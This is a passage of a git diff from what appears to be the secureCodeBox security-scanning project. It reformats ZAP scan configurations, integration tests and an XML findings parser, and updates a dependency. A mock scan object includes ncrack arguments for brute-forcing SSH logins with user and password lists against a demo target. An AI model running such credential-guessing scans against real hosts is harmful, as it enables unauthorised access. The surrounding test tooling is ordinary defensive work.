ajax spider will be allowed to run for, default: 0 unlimited - type: passiveScan-wait # Passive scan wait for the passive scanner to finish parameters: - maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited + maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] --- apiVersion: v1 kind: ConfigMap @@ -81,11 +76,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts : # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://nginx.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://nginx.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://nginx.demo-targets.svc/.*" # An optional list of regexes to include + - "http://nginx.demo-targets.svc/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -94,9 +89,9 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -107,24 +102,20 @@ data: scanOnlyInScope: true # Bool: Only scan URLs in scope (recommended) - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited - type: passiveScan-wait # Passive scan wait for the passive scanner to finish parameters: - maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited + maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] --- apiVersion: v1 kind: ConfigMap @@ -134,11 +125,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://bodgeit.demo-targets.svc:8080"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://bodgeit.demo-targets.svc:8080"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://bodgeit.demo-targets.svc:8080/.*" # An optional list of regexes to include + - "http://bodgeit.demo-targets.svc:8080/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -147,30 +138,26 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout jobs: - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context + context: test-config # String: Name of the context to spider, default: first context maxDuration: 1 - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] --- apiVersion: v1 kind: ConfigMap @@ -180,11 +167,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://swagger-petstore.demo-targets.svc"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://petstore.demo-targets.svc/.*" # An optional list of regexes to include + - "http://swagger-petstore.demo-targets.svc/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -193,27 +180,23 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout jobs: - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 1 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context + context: test-config # String: Name of the context to spider, default: first context maxDuration: 1 - type: report # Report generation parameters: - template: traditional-xml # String: The template id, default : modern - reportDir: /home/securecodebox/ # String: The directory into which the report will be written - reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] - risks: # List: The risks to include in this report, default all - - high - - medium - - low \ No newline at end of file + template: traditional-xml # String: The template id, default : modern + reportDir: /home/securecodebox/ # String: The directory into which the report will be written + reportFile: zap-results # String: The report file name pattern, default: {{yyyy-MM-dd}}-ZAP-Report-[[site]] diff --git a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js index 6883246d45..f0d5ff4fd1 100644 --- a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js +++ b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js @@ -2,9 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; -test.concurrent( +test( "zap automation scan without config against 'bodgeit' should only find couple findings", async () => { const { count } = await scan( @@ -13,24 +13,30 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 30, // volumes - [{ - "name": "zap-automation-framework-bodgeit", - "configMap": {"name": "zap-automation-framework-bodgeit"} - }], + [ + { + name: "zap-automation-framework-bodgeit", + configMap: { name: "zap-automation-framework-bodgeit" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-bodgeit", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-bodgeit", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000 + { + timeout: 60 * 8 * 1000, + }, ); -test.concurrent( +test( "zap automation scan without config against 'swagger-petstore' should only find couple findings", async () => { const { count } = await scan( @@ -39,24 +45,30 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 30, // volumes - [{ - "name": "zap-automation-framework-petstore", - "configMap": {"name": "zap-automation-framework-petstore"} - }], + [ + { + name: "zap-automation-framework-petstore", + configMap: { name: "zap-automation-framework-petstore" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-petstore", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-petstore", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000 + { + timeout: 60 * 8 * 1000, + }, ); -test.concurrent( +test( "zap automation scan against a plain nginx container should only find a couple of findings", async () => { const { count } = await scan( @@ -65,24 +77,30 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 31 * 1000, // volumes - [{ - "name": "zap-automation-framework-nginx", - "configMap": {"name": "zap-automation-framework-nginx"} - }], + [ + { + name: "zap-automation-framework-nginx", + configMap: { name: "zap-automation-framework-nginx" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-nginx", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-nginx", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000 + { + timeout: 60 * 8 * 1000, + }, ); -test.concurrent( +test( "authenticated zap automation scan with little spider time against a juice shop container should find some findings", async () => { const { count } = await scan( @@ -91,19 +109,25 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 31 * 1000, // volumes - [{ - "name": "zap-automation-framework-juicehop", - "configMap": {"name": "zap-automation-framework-juicehop"} - }], + [ + { + name: "zap-automation-framework-juicehop", + configMap: { name: "zap-automation-framework-juicehop" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-juicehop", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-juicehop", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000 -); \ No newline at end of file + { + timeout: 60 * 8 * 1000, + }, +); diff --git a/scanners/zap-automation-framework/parser/Dockerfile b/scanners/zap-automation-framework/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/zap-automation-framework/parser/Dockerfile +++ b/scanners/zap-automation-framework/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/zap-automation-framework/parser/package-lock.json b/scanners/zap-automation-framework/parser/package-lock.json index 505a6c4637..d95f4d94ee 100644 --- a/scanners/zap-automation-framework/parser/package-lock.json +++ b/scanners/zap-automation-framework/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.5.0" + "xml2js": "^0.6.2" }, "devDependencies": {} }, @@ -19,9 +19,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", - "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,9 +47,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", - "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/zap-automation-framework/parser/package.json b/scanners/zap-automation-framework/parser/package.json index 6e3367e3f0..55c4beb67e 100644 --- a/scanners/zap-automation-framework/parser/package.json +++ b/scanners/zap-automation-framework/parser/package.json @@ -3,12 +3,13 @@ "version": "1.0.0", "description": "Parses result files for the type: 'zap-xml'", "main": "", + "type": "module", "scripts": {}, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.5.0" + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/zap-automation-framework/parser/parser.js b/scanners/zap-automation-framework/parser/parser.js index fecb960bd2..adb9084d81 100644 --- a/scanners/zap-automation-framework/parser/parser.js +++ b/scanners/zap-automation-framework/parser/parser.js @@ -1,7 +1,7 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require("xml2js"); +import { parseStringPromise } from "xml2js"; function riskToSeverity(risk) { switch (parseInt(risk, 10)) { @@ -51,30 +51,36 @@ function normalizeXmlObject(rawAlert = {}) { } function createFindingFromAlert(alert, { location, host, port }) { - let findingUrls = [] - if(Array.isArray(alert.instances.instance)) { + let findingUrls = []; + if (Array.isArray(alert.instances.instance)) { findingUrls = alert.instances.instance.map(normalizeXmlObject); } - const urlList = alert.reference.split('

').filter(item => item !== '').map(item => stripHtmlTags(item)); - const urlReferences = urlList.map(element => ({ + const urlList = alert.reference + .split("

") + .filter((item) => item !== "") + .map((item) => stripHtmlTags(item)); + const urlReferences = urlList.map((element) => ({ type: "URL", value: element, })); - - const cweReferences = (alert.cweid !== '-1' && alert.cweid !== undefined) ? [ - { - type: "CWE", - value: "CWE-" + alert.cweid, - }, - { - type: "URL", - value: "https://cwe.mitre.org/data/definitions/" + alert.cweid + ".html", - }, - ] : []; - + + const cweReferences = + alert.cweid !== "-1" && alert.cweid !== undefined + ? [ + { + type: "CWE", + value: "CWE-" + alert.cweid, + }, + { + type: "URL", + value: + "https://cwe.mitre.org/data/definitions/" + alert.cweid + ".html", + }, + ] + : []; + const references = [...urlReferences, ...cweReferences]; - return { name: stripHtmlTags(alert.name), @@ -94,20 +100,20 @@ function createFindingFromAlert(alert, { location, host, port }) { zap_solution: stripHtmlTags(alert.solution) || null, zap_otherinfo: truncate({ text: stripHtmlTags(alert.otherinfo) || null, - maxLength: 2048 + maxLength: 2048, }), zap_reference: stripHtmlTags(alert.reference) || null, zap_cweid: alert.cweid || null, zap_wascid: alert.wascid || null, zap_riskcode: alert.riskcode || null, zap_pluginid: alert.pluginid || null, - zap_finding_urls: findingUrls - } + zap_finding_urls: findingUrls, + }, }; } -async function parse(fileContent) { - const { OWASPZAPReport } = await xml2js.parseStringPromise(fileContent); +export async function parse(fileContent) { + const { OWASPZAPReport } = await parseStringPromise(fileContent); const findings = []; @@ -124,5 +130,3 @@ async function parse(fileContent) { return findings; } - -module.exports.parse = parse; diff --git a/scanners/zap-automation-framework/parser/parser.test.js b/scanners/zap-automation-framework/parser/parser.test.js index e0ef8e4672..204340d49c 100644 --- a/scanners/zap-automation-framework/parser/parser.test.js +++ b/scanners/zap-automation-framework/parser/parser.test.js @@ -2,19 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("Parsing the juice-shop results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/juice-shop.xml", + import.meta.dirname + "/__testFiles__/juice-shop.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -24,10 +22,10 @@ test("Parsing the juice-shop results.", async () => { test("Parsing the example.com results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example.com.xml", + import.meta.dirname + "/__testFiles__/example.com.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -37,10 +35,10 @@ test("Parsing the example.com results.", async () => { test("Parsing the docs.securecodebox.io results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/docs.securecodebox.io.xml", + import.meta.dirname + "/__testFiles__/docs.securecodebox.io.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -50,10 +48,10 @@ test("Parsing the docs.securecodebox.io results.", async () => { test("Parsing an empty result.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/not-found.xml", + import.meta.dirname + "/__testFiles__/not-found.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -62,9 +60,12 @@ test("Parsing an empty result.", async () => { }); test("Parsing a nginx result.", async () => { - const fileContent = await readFile(__dirname + "/__testFiles__/nginx.xml", { - encoding: "utf8", - }); + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/nginx.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -72,11 +73,14 @@ test("Parsing a nginx result.", async () => { }); test("Parsing a bodgeit result.", async () => { - const fileContent = await readFile(__dirname + "/__testFiles__/bodgeit.xml", { - encoding: "utf8", - }); + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/bodgeit.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); -}); \ No newline at end of file +}); diff --git a/tests/integration/__snapshots__/helpers.test.js.snap b/tests/integration/__snapshots__/helpers.test.js.snap deleted file mode 100644 index cc1ed90764..0000000000 --- a/tests/integration/__snapshots__/helpers.test.js.snap +++ /dev/null @@ -1,89 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`Kubernetes interaction tests cascading scan function should create a cascading scan and return findings on successful completion 1`] = ` -{ - "categories": { - "Discovered Credentials": 1, - }, - "count": 1, - "severities": { - "high": 1, - }, -} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 1`] = ` -{ - "categories": { - "Vulnerability": 24, - }, - "count": 24, - "severities": { - "high": 24, - }, -} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 2`] = ` -[MockFunction] { - "calls": [ - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "generateName": "nmap-example-", - }, - "spec": { - "initContainers": [], - "parameters": [], - "scanType": "nmap", - "volumeMounts": [], - "volumes": [], - }, - }, - ], - ], - "results": [ - { - "type": "return", - "value": Promise {}, - }, - ], -} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 3`] = ` -[MockFunction] { - "calls": [ - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - "nmap-example-pw8vt", - ], - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - "nmap-example-pw8vt", - ], - ], - "results": [ - { - "type": "return", - "value": Promise {}, - }, - { - "type": "return", - "value": Promise {}, - }, - ], -} -`; diff --git a/tests/integration/__snapshots__/helpers.test.js.snap.license b/tests/integration/__snapshots__/helpers.test.js.snap.license deleted file mode 100644 index c95bc37185..0000000000 --- a/tests/integration/__snapshots__/helpers.test.js.snap.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json b/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json index 57db132c7d..c08b9ab5ba 100644 --- a/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json +++ b/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json @@ -1,399 +1,397 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "items": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "6c32098e-36e0-491a-b40b-1741081bf7c7", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-7jz42", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "items": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "6c32098e-36e0-491a-b40b-1741081bf7c7", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-7jz42", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-02-02T16:45:30Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "ncrack-dummy-ssh-7jz42-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-02-02T16:45:30Z" }, - "creationTimestamp": "2024-02-02T16:45:30Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-7jz42-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"c887fffa-ddc9-4a7a-9415-7c46cfaa3649\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-02-02T16:45:30Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"c887fffa-ddc9-4a7a-9415-7c46cfaa3649\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { - ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } - }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-02-02T16:45:30Z" + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "time": "2024-02-02T16:45:30Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } + }, + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:38Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:severities": {} + "f:Discovered Credentials": {} }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:38Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {}, - "f:informational": {}, - "f:low": {}, - "f:medium": {} - } + "f:count": {}, + "f:severities": { + "f:high": {}, + "f:informational": {}, + "f:low": {}, + "f:medium": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:44Z" - } - ], - "name": "ncrack-dummy-ssh-7jz42-ncrack-ssh-h9fdz", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-7jz42", - "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" - } - ], - "resourceVersion": "10500", - "uid": "f0816a28-9b61-4e3e-a586-dd8539390264" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:44Z" + } + ], + "name": "ncrack-dummy-ssh-7jz42-ncrack-ssh-h9fdz", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-7jz42", + "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" + } + ], + "resourceVersion": "10500", + "uid": "f0816a28-9b61-4e3e-a586-dd8539390264" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": 